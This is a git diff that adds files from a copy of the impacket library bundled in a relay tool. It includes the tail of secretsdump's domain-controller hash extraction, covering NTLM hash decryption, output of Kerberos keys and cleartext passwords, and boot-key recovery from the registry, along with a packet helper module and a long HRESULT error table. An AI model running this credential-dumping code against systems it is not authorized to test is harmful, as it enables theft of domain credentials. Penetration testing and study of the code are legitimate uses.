+ if userRecord['pmsgOut'][replyVersion]['cNumObjects'] == 0:
+ raise Exception('DRSGetNCChanges didn\'t return any object!')
+ else:
+ LOG.warning('DRSCrackNames returned %d items for user %s, skipping' % (
+ crackedName['pmsgOut']['V1']['pResult']['cItems'], userName))
+ try:
+ self.__decryptHash(userRecord,
+ userRecord['pmsgOut'][replyVersion]['PrefixTableSrc']['pPrefixEntry'],
+ hashesOutputFile)
+ if self.__justNTLM is False:
+ self.__decryptSupplementalInfo(userRecord, userRecord['pmsgOut'][replyVersion]['PrefixTableSrc'][
+ 'pPrefixEntry'], keysOutputFile, clearTextOutputFile)
+
+ except Exception as e:
+ LOG.error("Error while processing user!")
+ LOG.debug("Exception", exc_info=True)
+ LOG.error(str(e))
+
+ # Saving the session state
+ self.__resumeSession.writeResumeData(userSid)
+
+ enumerationContext = resp['EnumerationContext']
+ status = resp['ErrorCode']
+
+ # Everything went well and we covered all the users
+ # Let's remove the resume file is we had created it
+ if self.__justUser is None:
+ self.__resumeSession.clearResumeData()
+
+ LOG.debug("Finished processing and printing user's hashes, now printing supplemental information")
+ # Now we'll print the Kerberos keys. So we don't mix things up in the output.
+ if len(self.__kerberosKeys) > 0:
+ if self.__useVSSMethod is True:
+ LOG.info('Kerberos keys from %s ' % self.__NTDS)
+ else:
+ LOG.info('Kerberos keys grabbed')
+
+ for itemKey in list(self.__kerberosKeys.keys()):
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS_KERBEROS, itemKey)
+
+ # And finally the cleartext pwds
+ if len(self.__clearTextPwds) > 0:
+ if self.__useVSSMethod is True:
+ LOG.info('ClearText password from %s ' % self.__NTDS)
+ else:
+ LOG.info('ClearText passwords grabbed')
+
+ for itemKey in list(self.__clearTextPwds.keys()):
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS_CLEARTEXT, itemKey)
+ finally:
+ # Resources cleanup
+ if hashesOutputFile is not None:
+ hashesOutputFile.close()
+
+ if keysOutputFile is not None:
+ keysOutputFile.close()
+
+ if clearTextOutputFile is not None:
+ clearTextOutputFile.close()
+
+ self.__resumeSession.endTransaction()
+
+ @classmethod
+ def __writeOutput(cls, fd, data):
+ try:
+ fd.write(data)
+ except Exception as e:
+ LOG.error("Error writing entry, skipping (%s)" % str(e))
+ pass
+
+ def finish(self):
+ if self.__NTDS is not None:
+ self.__ESEDB.close()
+
+class LocalOperations:
+ def __init__(self, systemHive):
+ self.__systemHive = systemHive
+
+ def getBootKey(self):
+ # Local Version whenever we are given the files directly
+ bootKey = b''
+ tmpKey = b''
+ winreg = winregistry.Registry(self.__systemHive, False)
+ # We gotta find out the Current Control Set
+ currentControlSet = winreg.getValue('\\Select\\Current')[1]
+ currentControlSet = "ControlSet%03d" % currentControlSet
+ for key in ['JD', 'Skew1', 'GBG', 'Data']:
+ LOG.debug('Retrieving class info for %s' % key)
+ ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet, key))
+ digit = ans[:16].decode('utf-16le')
+ tmpKey = tmpKey + b(digit)
+
+ transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
+
+ tmpKey = unhexlify(tmpKey)
+
+ for i in range(len(tmpKey)):
+ bootKey += tmpKey[transforms[i]:transforms[i] + 1]
+
+ LOG.info('Target system bootKey: 0x%s' % hexlify(bootKey).decode('utf-8'))
+
+ return bootKey
+
+
+ def checkNoLMHashPolicy(self):
+ LOG.debug('Checking NoLMHash Policy')
+ winreg = winregistry.Registry(self.__systemHive, False)
+ # We gotta find out the Current Control Set
+ currentControlSet = winreg.getValue('\\Select\\Current')[1]
+ currentControlSet = "ControlSet%03d" % currentControlSet
+
+ # noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
+ noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
+ if noLmHash is not None:
+ noLmHash = noLmHash[1]
+ else:
+ noLmHash = 0
+
+ if noLmHash != 1:
+ LOG.debug('LMHashes are being stored')
+ return False
+ LOG.debug('LMHashes are NOT being stored')
+ return True
+
+def _print_helper(*args, **kwargs):
+ print(args[-1])
diff --git a/tools/MultiRelay/impacket-dev/impacket/helper.py b/tools/MultiRelay/impacket-dev/impacket/helper.py
new file mode 100644
index 0000000..f56054b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/helper.py
@@ -0,0 +1,150 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+# Helper used to build ProtocolPackets
+#
+# Author:
+# Aureliano Calvo
+
+
+import struct
+import functools
+from six import add_metaclass
+
+import impacket.ImpactPacket as ip
+
+
+def rebind(f):
+ functools.wraps(f)
+ def rebinder(*args, **kwargs):
+ return f(*args, **kwargs)
+
+ return rebinder
+
+class Field(object):
+ def __init__(self, index):
+ self.index = index
+
+ def __call__(self, k, d):
+ getter = rebind(self.getter)
+ getter_name = "get_" + k
+ getter.__name__ = getter_name
+ getter.__doc__ = "Get the %s field" % k
+ d[getter_name] = getter
+
+ setter = rebind(self.setter)
+ setter_name = "set_" + k
+ setter.__name__ = setter_name
+ setter.__doc__ = "Set the %s field" % k
+ d["set_" + k] = setter
+
+ d[k] = property(getter, setter, doc="%s property" % k)
+
+class Bit(Field):
+ def __init__(self, index, bit_number):
+ Field.__init__(self, index)
+ self.mask = 2 ** bit_number
+ self.off_mask = (~self.mask) & 0xff
+
+ def getter(self, o):
+ return (o.header.get_byte(self.index) & self.mask) != 0
+
+ def setter(self, o, value=True):
+ b = o.header.get_byte(self.index)
+ if value:
+ b |= self.mask
+ else:
+ b &= self.off_mask
+
+ o.header.set_byte(self.index, b)
+
+class Byte(Field):
+
+ def __init__(self, index):
+ Field.__init__(self, index)
+
+ def getter(self, o):
+ return o.header.get_byte(self.index)
+
+ def setter(self, o, value):
+ o.header.set_byte(self.index, value)
+
+class Word(Field):
+ def __init__(self, index, order="!"):
+ Field.__init__(self, index)
+ self.order = order
+
+ def getter(self, o):
+ return o.header.get_word(self.index, self.order)
+
+ def setter(self, o, value):
+ o.header.set_word(self.index, value, self.order)
+
+class Long(Field):
+ def __init__(self, index, order="!"):
+ Field.__init__(self, index)
+ self.order = order
+
+ def getter(self, o):
+ return o.header.get_long(self.index, self.order)
+
+ def setter(self, o, value):
+ o.header.set_long(self.index, value, self.order)
+
+class ThreeBytesBigEndian(Field):
+ def __init__(self, index):
+ Field.__init__(self, index)
+
+ def getter(self, o):
+ b=o.header.get_bytes()[self.index:self.index+3].tostring()
+ #unpack requires a string argument of length 4 and b is 3 bytes long
+ (value,)=struct.unpack('!L', b'\x00'+b)
+ return value
+
+ def setter(self, o, value):
+ # clear the bits
+ mask = ((~0xFFFFFF00) & 0xFF)
+ masked = o.header.get_long(self.index, ">") & mask
+ # set the bits
+ nb = masked | ((value & 0x00FFFFFF) << 8)
+ o.header.set_long(self.index, nb, ">")
+
+
+class ProtocolPacketMetaklass(type):
+ def __new__(cls, name, bases, d):
+ d["_fields"] = []
+ items = list(d.items())
+ if not object in bases:
+ bases += (object,)
+ for k,v in items:
+ if isinstance(v, Field):
+ d["_fields"].append(k)
+ v(k, d)
+
+ d["_fields"].sort()
+
+ def _fields_repr(self):
+ return " ".join( "%s:%s" % (f, repr(getattr(self, f))) for f in self._fields )
+ def __repr__(self):
+
+ return "<%(name)s %(fields)s \nchild:%(r_child)s>" % {
+ "name": name,
+ "fields": self._fields_repr(),
+ "r_child": repr(self.child()),
+ }
+
+ d["_fields_repr"] = _fields_repr
+ d["__repr__"] = __repr__
+
+ return type.__new__(cls, name, bases, d)
+
+@add_metaclass(ProtocolPacketMetaklass)
+class ProtocolPacket(ip.ProtocolPacket):
+ def __init__(self, buff = None):
+ ip.ProtocolPacket.__init__(self, self.header_size, self.tail_size)
+ if buff:
+ self.load_packet(buff)
diff --git a/tools/MultiRelay/impacket-dev/impacket/hresult_errors.py b/tools/MultiRelay/impacket-dev/impacket/hresult_errors.py
new file mode 100644
index 0000000..7f7eb06
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/hresult_errors.py
@@ -0,0 +1,5872 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+# HRESULT Errors from [MS-ERREF]. Ideally all the files
+# should grab the error codes from here (big ToDo)
+#
+
+ERROR_MESSAGES = {
+ 0x00030200: ("STG_S_CONVERTED", "The underlying file was converted to compound file format."),
+ 0x00030201: ("STG_S_BLOCK", "The storage operation should block until more data is available."),
+ 0x00030202: ("STG_S_RETRYNOW", "The storage operation should retry immediately."),
+ 0x00030203: ("STG_S_MONITORING", "The notified event sink will not influence the storage operation."),
+ 0x00030204: ("STG_S_MULTIPLEOPENS", "Multiple opens prevent consolidated (commit succeeded)."),
+ 0x00030205: ("STG_S_CONSOLIDATIONFAILED", "Consolidation of the storage file failed (commit succeeded)."),
+ 0x00030206: ("STG_S_CANNOTCONSOLIDATE", "Consolidation of the storage file is inappropriate (commit succeeded)."),
+ 0x00040000: ("OLE_S_USEREG", "Use the registry database to provide the requested information."),
+ 0x00040001: ("OLE_S_STATIC", "Success, but static."),
+ 0x00040002: ("OLE_S_MAC_CLIPFORMAT", "Macintosh clipboard format."),
+ 0x00040100: ("DRAGDROP_S_DROP", "Successful drop took place."),
+ 0x00040101: ("DRAGDROP_S_CANCEL", "Drag-drop operation canceled."),
+ 0x00040102: ("DRAGDROP_S_USEDEFAULTCURSORS", "Use the default cursor."),
+ 0x00040130: ("DATA_S_SAMEFORMATETC", "Data has same FORMATETC."),
+ 0x00040140: ("VIEW_S_ALREADY_FROZEN", "View is already frozen."),
+ 0x00040170: ("CACHE_S_FORMATETC_NOTSUPPORTED", "FORMATETC not supported."),
+ 0x00040171: ("CACHE_S_SAMECACHE", "Same cache."),
+ 0x00040172: ("CACHE_S_SOMECACHES_NOTUPDATED", "Some caches are not updated."),
+ 0x00040180: ("OLEOBJ_S_INVALIDVERB", "Invalid verb for OLE object."),
+ 0x00040181: ("OLEOBJ_S_CANNOT_DOVERB_NOW", "Verb number is valid but verb cannot be done now."),
+ 0x00040182: ("OLEOBJ_S_INVALIDHWND", "Invalid window handle passed."),
+ 0x000401A0: ("INPLACE_S_TRUNCATED", "Message is too long; some of it had to be truncated before displaying."),
+ 0x000401C0: ("CONVERT10_S_NO_PRESENTATION", "Unable to convert OLESTREAM to IStorage."),
+ 0x000401E2: ("MK_S_REDUCED_TO_SELF", "Moniker reduced to itself."),
+ 0x000401E4: ("MK_S_ME", "Common prefix is this moniker."),
+ 0x000401E5: ("MK_S_HIM", "Common prefix is input moniker."),
+ 0x000401E6: ("MK_S_US", "Common prefix is both monikers."),
+ 0x000401E7: ("MK_S_MONIKERALREADYREGISTERED", "Moniker is already registered in running object table."),
+ 0x00040200: ("EVENT_S_SOME_SUBSCRIBERS_FAILED", "An event was able to invoke some, but not all, of the subscribers."),
+ 0x00040202: ("EVENT_S_NOSUBSCRIBERS", "An event was delivered, but there were no subscribers."),
+ 0x00041300: ("SCHED_S_TASK_READY", "The task is ready to run at its next scheduled time."),
+ 0x00041301: ("SCHED_S_TASK_RUNNING", "The task is currently running."),
+ 0x00041302: ("SCHED_S_TASK_DISABLED", "The task will not run at the scheduled times because it has been disabled."),
+ 0x00041303: ("SCHED_S_TASK_HAS_NOT_RUN", "The task has not yet run."),
+ 0x00041304: ("SCHED_S_TASK_NO_MORE_RUNS", "There are no more runs scheduled for this task."),
+ 0x00041305: ("SCHED_S_TASK_NOT_SCHEDULED", "One or more of the properties that are needed to run this task on a schedule have not been set."),
+ 0x00041306: ("SCHED_S_TASK_TERMINATED", "The last run of the task was terminated by the user."),
+ 0x00041307: ("SCHED_S_TASK_NO_VALID_TRIGGERS", "Either the task has no triggers, or the existing triggers are disabled or not set."),
+ 0x00041308: ("SCHED_S_EVENT_TRIGGER", "Event triggers do not have set run times."),
+ 0x0004131B: ("SCHED_S_SOME_TRIGGERS_FAILED", "The task is registered, but not all specified triggers will start the task."),
+ 0x0004131C: ("SCHED_S_BATCH_LOGON_PROBLEM", "The task is registered, but it may fail to start. Batch logon privilege needs to be enabled for the task principal."),
+ 0x0004D000: ("XACT_S_ASYNC", "An asynchronous operation was specified. The operation has begun, but its outcome is not known yet."),
+ 0x0004D002: ("XACT_S_READONLY", "The method call succeeded because the transaction was read-only."),
+ 0x0004D003: ("XACT_S_SOMENORETAIN", "The transaction was successfully aborted. However, this is a coordinated transaction, and a number of enlisted resources were aborted outright because they could not support abort-retaining semantics."),
+ 0x0004D004: ("XACT_S_OKINFORM", "No changes were made during this call, but the sink wants another chance to look if any other sinks make further changes."),
+ 0x0004D005: ("XACT_S_MADECHANGESCONTENT", "The sink is content and wants the transaction to proceed. Changes were made to one or more resources during this call."),
+ 0x0004D006: ("XACT_S_MADECHANGESINFORM", "The sink is for the moment and wants the transaction to proceed, but if other changes are made following this return by other event sinks, this sink wants another chance to look."),
+ 0x0004D007: ("XACT_S_ALLNORETAIN", "The transaction was successfully aborted. However, the abort was nonretaining."),
+ 0x0004D008: ("XACT_S_ABORTING", "An abort operation was already in progress."),
+ 0x0004D009: ("XACT_S_SINGLEPHASE", "The resource manager has performed a single-phase commit of the transaction."),
+ 0x0004D00A: ("XACT_S_LOCALLY_OK", "The local transaction has not aborted."),
+ 0x0004D010: ("XACT_S_LASTRESOURCEMANAGER", "The resource manager has requested to be the coordinator (last resource manager) for the transaction."),
+ 0x00080012: ("CO_S_NOTALLINTERFACES", "Not all the requested interfaces were available."),
+ 0x00080013: ("CO_S_MACHINENAMENOTFOUND", "The specified machine name was not found in the cache."),
+ 0x00090312: ("SEC_I_CONTINUE_NEEDED", "The function completed successfully, but it must be called again to complete the context."),
+ 0x00090313: ("SEC_I_COMPLETE_NEEDED", "The function completed successfully, but CompleteToken must be called."),
+ 0x00090314: ("SEC_I_COMPLETE_AND_CONTINUE", "The function completed successfully, but both CompleteToken and this function must be called to complete the context."),
+ 0x00090315: ("SEC_I_LOCAL_LOGON", "The logon was completed, but no network authority was available. The logon was made using locally known information."),
+ 0x00090317: ("SEC_I_CONTEXT_EXPIRED", "The context has expired and can no longer be used."),
+ 0x00090320: ("SEC_I_INCOMPLETE_CREDENTIALS", "The credentials supplied were not complete and could not be verified. Additional information can be returned from the context."),
+ 0x00090321: ("SEC_I_RENEGOTIATE", "The context data must be renegotiated with the peer."),
+ 0x00090323: ("SEC_I_NO_LSA_CONTEXT", "There is no LSA mode context associated with this context."),
+ 0x0009035C: ("SEC_I_SIGNATURE_NEEDED", "A signature operation must be performed before the user can authenticate."),
+ 0x00091012: ("CRYPT_I_NEW_PROTECTION_REQUIRED", "The protected data needs to be reprotected."),
+ 0x000D0000: ("NS_S_CALLPENDING", "The requested operation is pending completion."),
+ 0x000D0001: ("NS_S_CALLABORTED", "The requested operation was aborted by the client."),
+ 0x000D0002: ("NS_S_STREAM_TRUNCATED", "The stream was purposefully stopped before completion."),
+ 0x000D0BC8: ("NS_S_REBUFFERING", "The requested operation has caused the source to rebuffer."),
+ 0x000D0BC9: ("NS_S_DEGRADING_QUALITY", "The requested operation has caused the source to degrade codec quality."),
+ 0x000D0BDB: ("NS_S_TRANSCRYPTOR_EOF", "The transcryptor object has reached end of file."),
+ 0x000D0FE8: ("NS_S_WMP_UI_VERSIONMISMATCH", "An upgrade may be needed for the theme manager to correctly show this skin. Skin reports version: %.1f."),
+ 0x000D0FE9: ("NS_S_WMP_EXCEPTION", "An error occurred in one of the UI components."),
+ 0x000D1040: ("NS_S_WMP_LOADED_GIF_IMAGE", "Successfully loaded a GIF file."),
+ 0x000D1041: ("NS_S_WMP_LOADED_PNG_IMAGE", "Successfully loaded a PNG file."),
+ 0x000D1042: ("NS_S_WMP_LOADED_BMP_IMAGE", "Successfully loaded a BMP file."),
+ 0x000D1043: ("NS_S_WMP_LOADED_JPG_IMAGE", "Successfully loaded a JPG file."),
+ 0x000D104F: ("NS_S_WMG_FORCE_DROP_FRAME", "Drop this frame."),
+ 0x000D105F: ("NS_S_WMR_ALREADYRENDERED", "The specified stream has already been rendered."),
+ 0x000D1060: ("NS_S_WMR_PINTYPEPARTIALMATCH", "The specified type partially matches this pin type."),
+ 0x000D1061: ("NS_S_WMR_PINTYPEFULLMATCH", "The specified type fully matches this pin type."),
+ 0x000D1066: ("NS_S_WMG_ADVISE_DROP_FRAME", "The timestamp is late compared to the current render position. Advise dropping this frame."),
+ 0x000D1067: ("NS_S_WMG_ADVISE_DROP_TO_KEYFRAME", "The timestamp is severely late compared to the current render position. Advise dropping everything up to the next key frame."),
+ 0x000D10DB: ("NS_S_NEED_TO_BUY_BURN_RIGHTS", "No burn rights. You will be prompted to buy burn rights when you try to burn this file to an audio CD."),
+ 0x000D10FE: ("NS_S_WMPCORE_PLAYLISTCLEARABORT", "Failed to clear playlist because it was aborted by user."),
+ 0x000D10FF: ("NS_S_WMPCORE_PLAYLISTREMOVEITEMABORT", "Failed to remove item in the playlist since it was aborted by user."),
+ 0x000D1102: ("NS_S_WMPCORE_PLAYLIST_CREATION_PENDING", "Playlist is being generated asynchronously."),
+ 0x000D1103: ("NS_S_WMPCORE_MEDIA_VALIDATION_PENDING", "Validation of the media is pending."),
+ 0x000D1104: ("NS_S_WMPCORE_PLAYLIST_REPEAT_SECONDARY_SEGMENTS_IGNORED", "Encountered more than one Repeat block during ASX processing."),
+ 0x000D1105: ("NS_S_WMPCORE_COMMAND_NOT_AVAILABLE", "Current state of WMP disallows calling this method or property."),
+ 0x000D1106: ("NS_S_WMPCORE_PLAYLIST_NAME_AUTO_GENERATED", "Name for the playlist has been auto generated."),
+ 0x000D1107: ("NS_S_WMPCORE_PLAYLIST_IMPORT_MISSING_ITEMS", "The imported playlist does not contain all items from the original."),
+ 0x000D1108: ("NS_S_WMPCORE_PLAYLIST_COLLAPSED_TO_SINGLE_MEDIA", "The M3U playlist has been ignored because it only contains one item."),
+ 0x000D1109: ("NS_S_WMPCORE_MEDIA_CHILD_PLAYLIST_OPEN_PENDING", "The open for the child playlist associated with this media is pending."),
+ 0x000D110A: ("NS_S_WMPCORE_MORE_NODES_AVAIABLE", "More nodes support the interface requested, but the array for returning them is full."),
+ 0x000D1135: ("NS_S_WMPBR_SUCCESS", "Backup or Restore successful!."),
+ 0x000D1136: ("NS_S_WMPBR_PARTIALSUCCESS", "Transfer complete with limitations."),
+ 0x000D1144: ("NS_S_WMPEFFECT_TRANSPARENT", "Request to the effects control to change transparency status to transparent."),
+ 0x000D1145: ("NS_S_WMPEFFECT_OPAQUE", "Request to the effects control to change transparency status to opaque."),
+ 0x000D114E: ("NS_S_OPERATION_PENDING", "The requested application pane is performing an operation and will not be released."),
+ 0x000D1359: ("NS_S_TRACK_BUY_REQUIRES_ALBUM_PURCHASE", "The file is only available for purchase when you buy the entire album."),
+ 0x000D135E: ("NS_S_NAVIGATION_COMPLETE_WITH_ERRORS", "There were problems completing the requested navigation. There are identifiers missing in the catalog."),
+ 0x000D1361: ("NS_S_TRACK_ALREADY_DOWNLOADED", "Track already downloaded."),
+ 0x000D1519: ("NS_S_PUBLISHING_POINT_STARTED_WITH_FAILED_SINKS", "The publishing point successfully started, but one or more of the requested data writer plug-ins failed."),
+ 0x000D2726: ("NS_S_DRM_LICENSE_ACQUIRED", "Status message: The license was acquired."),
+ 0x000D2727: ("NS_S_DRM_INDIVIDUALIZED", "Status message: The security upgrade has been completed."),
+ 0x000D2746: ("NS_S_DRM_MONITOR_CANCELLED", "Status message: License monitoring has been canceled."),
+ 0x000D2747: ("NS_S_DRM_ACQUIRE_CANCELLED", "Status message: License acquisition has been canceled."),
+ 0x000D276E: ("NS_S_DRM_BURNABLE_TRACK", "The track is burnable and had no playlist burn limit."),
+ 0x000D276F: ("NS_S_DRM_BURNABLE_TRACK_WITH_PLAYLIST_RESTRICTION", "The track is burnable but has a playlist burn limit."),
+ 0x000D27DE: ("NS_S_DRM_NEEDS_INDIVIDUALIZATION", "A security upgrade is required to perform the operation on this media file."),
+ 0x000D2AF8: ("NS_S_REBOOT_RECOMMENDED", "Installation was successful; however, some file cleanup is not complete. For best results, restart your computer."),
+ 0x000D2AF9: ("NS_S_REBOOT_REQUIRED", "Installation was successful; however, some file cleanup is not complete. To continue, you must restart your computer."),
+ 0x000D2F09: ("NS_S_EOSRECEDING", "EOS hit during rewinding."),
+ 0x000D2F0D: ("NS_S_CHANGENOTICE", "Internal."),
+ 0x001F0001: ("ERROR_FLT_IO_COMPLETE", "The IO was completed by a filter."),
+ 0x00262307: ("ERROR_GRAPHICS_MODE_NOT_PINNED", "No mode is pinned on the specified VidPN source or target."),
+ 0x0026231E: ("ERROR_GRAPHICS_NO_PREFERRED_MODE", "Specified mode set does not specify preference for one of its modes."),
+ 0x0026234B: ("ERROR_GRAPHICS_DATASET_IS_EMPTY", "Specified data set (for example, mode set, frequency range set, descriptor set, and topology) is empty."),
+ 0x0026234C: ("ERROR_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET", "Specified data set (for example, mode set, frequency range set, descriptor set, and topology) does not contain any more elements."),
+ 0x00262351: ("ERROR_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED", "Specified content transformation is not pinned on the specified VidPN present path."),
+ 0x00300100: ("PLA_S_PROPERTY_IGNORED", "Property value will be ignored."),
+ 0x00340001: ("ERROR_NDIS_INDICATION_REQUIRED", "The request will be completed later by a Network Driver Interface Specification (NDIS) status indication."),
+ 0x0DEAD100: ("TRK_S_OUT_OF_SYNC", "The VolumeSequenceNumber of a MOVE_NOTIFICATION request is incorrect."),
+ 0x0DEAD102: ("TRK_VOLUME_NOT_FOUND", "The VolumeID in a request was not found in the server's ServerVolumeTable."),
+ 0x0DEAD103: ("TRK_VOLUME_NOT_OWNED", "A notification was sent to the LnkSvrMessage method, but the RequestMachine for the request was not the VolumeOwner for a VolumeID in the request."),
+ 0x0DEAD107: ("TRK_S_NOTIFICATION_QUOTA_EXCEEDED", "The server received a MOVE_NOTIFICATION request, but the FileTable size limit has already been reached."),
+ 0x400D004F: ("NS_I_TIGER_START", "The Title Server %1 is running."),
+ 0x400D0051: ("NS_I_CUB_START", "Content Server %1 (%2) is starting."),
+ 0x400D0052: ("NS_I_CUB_RUNNING", "Content Server %1 (%2) is running."),
+ 0x400D0054: ("NS_I_DISK_START", "Disk %1 ( %2 ) on Content Server %3, is running."),
+ 0x400D0056: ("NS_I_DISK_REBUILD_STARTED", "Started rebuilding disk %1 ( %2 ) on Content Server %3."),
+ 0x400D0057: ("NS_I_DISK_REBUILD_FINISHED", "Finished rebuilding disk %1 ( %2 ) on Content Server %3."),
+ 0x400D0058: ("NS_I_DISK_REBUILD_ABORTED", "Aborted rebuilding disk %1 ( %2 ) on Content Server %3."),
+ 0x400D0059: ("NS_I_LIMIT_FUNNELS", "A NetShow administrator at network location %1 set the data stream limit to %2 streams."),
+ 0x400D005A: ("NS_I_START_DISK", "A NetShow administrator at network location %1 started disk %2."),
+ 0x400D005B: ("NS_I_STOP_DISK", "A NetShow administrator at network location %1 stopped disk %2."),
+ 0x400D005C: ("NS_I_STOP_CUB", "A NetShow administrator at network location %1 stopped Content Server %2."),
+ 0x400D005D: ("NS_I_KILL_USERSESSION", "A NetShow administrator at network location %1 aborted user session %2 from the system."),
+ 0x400D005E: ("NS_I_KILL_CONNECTION", "A NetShow administrator at network location %1 aborted obsolete connection %2 from the system."),
+ 0x400D005F: ("NS_I_REBUILD_DISK", "A NetShow administrator at network location %1 started rebuilding disk %2."),
+ 0x400D0069: ("MCMADM_I_NO_EVENTS", "Event initialization failed, there will be no MCM events."),
+ 0x400D006E: ("NS_I_LOGGING_FAILED", "The logging operation failed."),
+ 0x400D0070: ("NS_I_LIMIT_BANDWIDTH", "A NetShow administrator at network location %1 set the maximum bandwidth limit to %2 bps."),
+ 0x400D0191: ("NS_I_CUB_UNFAIL_LINK", "Content Server %1 (%2) has established its link to Content Server %3."),
+ 0x400D0193: ("NS_I_RESTRIPE_START", "Restripe operation has started."),
+ 0x400D0194: ("NS_I_RESTRIPE_DONE", "Restripe operation has completed."),
+ 0x400D0196: ("NS_I_RESTRIPE_DISK_OUT", "Content disk %1 (%2) on Content Server %3 has been restriped out."),
+ 0x400D0197: ("NS_I_RESTRIPE_CUB_OUT", "Content server %1 (%2) has been restriped out."),
+ 0x400D0198: ("NS_I_DISK_STOP", "Disk %1 ( %2 ) on Content Server %3, has been offlined."),
+ 0x400D14BE: ("NS_I_PLAYLIST_CHANGE_RECEDING", "The playlist change occurred while receding."),
+ 0x400D2EFF: ("NS_I_RECONNECTED", "The client is reconnected."),
+ 0x400D2F01: ("NS_I_NOLOG_STOP", "Forcing a switch to a pending header on start."),
+ 0x400D2F03: ("NS_I_EXISTING_PACKETIZER", "There is already an existing packetizer plugin for the stream."),
+ 0x400D2F04: ("NS_I_MANUAL_PROXY", "The proxy setting is manual."),
+ 0x40262009: ("ERROR_GRAPHICS_DRIVER_MISMATCH", "The kernel driver detected a version mismatch between it and the user mode driver."),
+ 0x4026242F: ("ERROR_GRAPHICS_UNKNOWN_CHILD_STATUS", "Child device presence was not reliably detected."),
+ 0x40262437: ("ERROR_GRAPHICS_LEADLINK_START_DEFERRED", "Starting the lead-link adapter has been deferred temporarily."),
+ 0x40262439: ("ERROR_GRAPHICS_POLLING_TOO_FREQUENTLY", "The display adapter is being polled for children too frequently at the same polling level."),
+ 0x4026243A: ("ERROR_GRAPHICS_START_DEFERRED", "Starting the adapter has been deferred temporarily."),
+ 0x8000000A: ("E_PENDING", "The data necessary to complete this operation is not yet available."),
+ 0x80004001: ("E_NOTIMPL", "Not implemented."),
+ 0x80004002: ("E_NOINTERFACE", "No such interface supported."),
+ 0x80004003: ("E_POINTER", "Invalid pointer."),
+ 0x80004004: ("E_ABORT", "Operation aborted."),
+ 0x80004005: ("E_FAIL", "Unspecified error."),
+ 0x80004006: ("CO_E_INIT_TLS", "Thread local storage failure."),
+ 0x80004007: ("CO_E_INIT_SHARED_ALLOCATOR", "Get shared memory allocator failure."),
+ 0x80004008: ("CO_E_INIT_MEMORY_ALLOCATOR", "Get memory allocator failure."),
+ 0x80004009: ("CO_E_INIT_CLASS_CACHE", "Unable to initialize class cache."),
+ 0x8000400A: ("CO_E_INIT_RPC_CHANNEL", "Unable to initialize remote procedure call (RPC) services."),
+ 0x8000400B: ("CO_E_INIT_TLS_SET_CHANNEL_CONTROL", "Cannot set thread local storage channel control."),
+ 0x8000400C: ("CO_E_INIT_TLS_CHANNEL_CONTROL", "Could not allocate thread local storage channel control."),
+ 0x8000400D: ("CO_E_INIT_UNACCEPTED_USER_ALLOCATOR", "The user-supplied memory allocator is unacceptable."),
+ 0x8000400E: ("CO_E_INIT_SCM_MUTEX_EXISTS", "The OLE service mutex already exists."),
+ 0x8000400F: ("CO_E_INIT_SCM_FILE_MAPPING_EXISTS", "The OLE service file mapping already exists."),
+ 0x80004010: ("CO_E_INIT_SCM_MAP_VIEW_OF_FILE", "Unable to map view of file for OLE service."),
+ 0x80004011: ("CO_E_INIT_SCM_EXEC_FAILURE", "Failure attempting to launch OLE service."),
+ 0x80004012: ("CO_E_INIT_ONLY_SINGLE_THREADED", "There was an attempt to call CoInitialize a second time while single-threaded."),
+ 0x80004013: ("CO_E_CANT_REMOTE", "A Remote activation was necessary but was not allowed."),
+ 0x80004014: ("CO_E_BAD_SERVER_NAME", "A Remote activation was necessary, but the server name provided was invalid."),
+ 0x80004015: ("CO_E_WRONG_SERVER_IDENTITY", "The class is configured to run as a security ID different from the caller."),
+ 0x80004016: ("CO_E_OLE1DDE_DISABLED", "Use of OLE1 services requiring Dynamic Data Exchange (DDE) Windows is disabled."),
+ 0x80004017: ("CO_E_RUNAS_SYNTAX", "A RunAs specification must be \ or simply ."),
+ 0x80004018: ("CO_E_CREATEPROCESS_FAILURE", "The server process could not be started. The path name may be incorrect."),
+ 0x80004019: ("CO_E_RUNAS_CREATEPROCESS_FAILURE", "The server process could not be started as the configured identity. The path name may be incorrect or unavailable."),
+ 0x8000401A: ("CO_E_RUNAS_LOGON_FAILURE", "The server process could not be started because the configured identity is incorrect. Check the user name and password."),
+ 0x8000401B: ("CO_E_LAUNCH_PERMSSION_DENIED", "The client is not allowed to launch this server."),
+ 0x8000401C: ("CO_E_START_SERVICE_FAILURE", "The service providing this server could not be started."),
+ 0x8000401D: ("CO_E_REMOTE_COMMUNICATION_FAILURE", "This computer was unable to communicate with the computer providing the server."),
+ 0x8000401E: ("CO_E_SERVER_START_TIMEOUT", "The server did not respond after being launched."),
+ 0x8000401F: ("CO_E_CLSREG_INCONSISTENT", "The registration information for this server is inconsistent or incomplete."),
+ 0x80004020: ("CO_E_IIDREG_INCONSISTENT", "The registration information for this interface is inconsistent or incomplete."),
+ 0x80004021: ("CO_E_NOT_SUPPORTED", "The operation attempted is not supported."),
+ 0x80004022: ("CO_E_RELOAD_DLL", "A DLL must be loaded."),
+ 0x80004023: ("CO_E_MSI_ERROR", "A Microsoft Software Installer error was encountered."),
+ 0x80004024: ("CO_E_ATTEMPT_TO_CREATE_OUTSIDE_CLIENT_CONTEXT", "The specified activation could not occur in the client context as specified."),
+ 0x80004025: ("CO_E_SERVER_PAUSED", "Activations on the server are paused."),
+ 0x80004026: ("CO_E_SERVER_NOT_PAUSED", "Activations on the server are not paused."),
